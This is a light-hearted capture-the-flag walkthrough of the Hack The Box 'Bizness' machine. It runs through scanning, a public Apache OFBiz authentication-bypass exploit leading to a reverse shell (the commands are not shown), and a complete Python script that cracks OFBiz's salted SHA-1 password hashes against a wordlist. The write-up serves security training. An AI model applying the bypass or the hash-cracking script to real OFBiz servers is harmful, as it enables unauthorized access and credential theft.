The Great Bizness Adventure with Rian Friedt

INTRODUCTION

Yo, fellow hackers! It’s ya boy, Rian Friedt, back with another cyber escapade! 🕵️‍♂️💻 Season 4 just dropped and with it, the “Bizness” machine — a 20-pointer with an ‘easy peasy lemon squeezy’ difficulty level. So, let’s dive into this digital jungle and do some bizness!

Getting Our Feet Wet

First things first, we gotta prep our /etc/hosts file with the IP and domain. Trust me, skipping this step is like trying to bake a cake without flour — it just won’t work! So, pop open your terminal and type away:

sudo nano /etc/hosts

SCANNING: The Treasure Hunt Begins

Armed with nmap, our trusty digital compass, we set sail:

nmap -Pn -sC -sV 10.10.11.252

And what do we find? Ports 80 and 443 waving at us like flags on a deserted island. Next stop, the web page bizness.htb! 🏴‍☠️🌐

Digging Deeper: The Dirsearch Saga

Next, we summon the mystical dirsearch tool to uncover hidden endpoints. It’s like playing hide and seek with the internet:

sudo apt-get install dirsearch
dirsearch -u https://bizness.htb 

After using dirsearch we get login endpoints.

we now need to go to /control/login endpoint to access the login page

Boom! We discover the /control/login endpoint. It’s time to crash this login party!

Cracking the Code: The ApacheOFBIZ Adventure

Upon landing on the login panel, we find it’s guarded by the ApacheOFBIZ web framework. A little bit of digital detective work (a.k.a. Googling) leads us to this:

GitHub — jakabakos/Apache-OFBiz-Authentication-Bypass

Jackpot! We can now commandeer the system with this exploit. Let’s gear up for some reverse shell action!

Now we see that we can execute any command by using the above exploit . So, we try to get reverse shell.

Setting up the nc listner

After FIREING the exploit we got a shell

used this command to make the shell more stable and sexy!

cd /home/ofbiz

cat user.txt

flag “78434809d644????????????????????????????”.

The Final Showdown: Cracking the Hash

In the depths of the server, I discovered the derby database and unearthed a cryptic clue: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN. It smelled like a SHA-1 hash with a pinch of salt. So, I whipped up this Python potion to crack it:

To crack the hash i have used the following script

import hashlib
import base64
import os
from tqdm import tqdm

class PasswordEncryptor:
    def __init__(self, hash_type="SHA", pbkdf2_iterations=10000):
        """
        Initialize the PasswordEncryptor object with a hash type and PBKDF2 iterations.
        :param hash_type: The hash algorithm to use (default is SHA).
        :param pbkdf2_iterations: The number of iterations for PBKDF2 (default is 10000).
        """
        self.hash_type = hash_type
        self.pbkdf2_iterations = pbkdf2_iterations
    def crypt_bytes(self, salt, value):
        """
        Crypt a password using the specified hash type and salt.
        :param salt: The salt used in the encryption.
        :param value: The password value to be encrypted.
        :return: The encrypted password string.
        """
        if not salt:
            salt = base64.urlsafe_b64encode(os.urandom(16)).decode('utf-8')
        hash_obj = hashlib.new(self.hash_type)
        hash_obj.update(salt.encode('utf-8'))
        hash_obj.update(value)
        hashed_bytes = hash_obj.digest()
        result = f"${self.hash_type}${salt}${base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')}"
        return result
    def get_crypted_bytes(self, salt, value):
        """
        Get the encrypted bytes for a password.
        :param salt: The salt used in the encryption.
        :param value: The password value to get encrypted bytes for.
        :return: The encrypted bytes as a string.
        """
        try:
            hash_obj = hashlib.new(self.hash_type)
            hash_obj.update(salt.encode('utf-8'))
            hash_obj.update(value)
            hashed_bytes = hash_obj.digest()
            return base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')
        except hashlib.NoSuchAlgorithmException as e:
            raise Exception(f"Error while computing hash of type {self.hash_type}: {e}")
# Example usage:
hash_type = "SHA1"
salt = "d"
search = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I="
wordlist = '/usr/wordlist/rockyou.txt'
# Create an instance of the PasswordEncryptor class
encryptor = PasswordEncryptor(hash_type)
# Get the number of lines in the wordlist for the loading bar
total_lines = sum(1 for _ in open(wordlist, 'r', encoding='latin-1'))
# Iterate through the wordlist with a loading bar and check for a matching password
with open(wordlist, 'r', encoding='latin-1') as password_list:
    for password in tqdm(password_list, total=total_lines, desc="Processing"):
        value = password.strip()
        
        # Get the encrypted password
        hashed_password = encryptor.crypt_bytes(salt, value.encode('utf-8'))
        
        # Compare with the search hash
        if hashed_password == search:
            print(f'Found Password:{value}, hash:{hashed_password}')
            break  # Stop the loop if a match is found

The Moment of Triumph: Root Flag Victory!

With the password “monke????????” in hand, I escalated my privileges, sauntered into the root directory, and there it was — the elusive root.txt!

🚩 Root flag conquered:

And that, my fellow adventurers, is how its done! We conquered the Bizness beast! Until next time ❤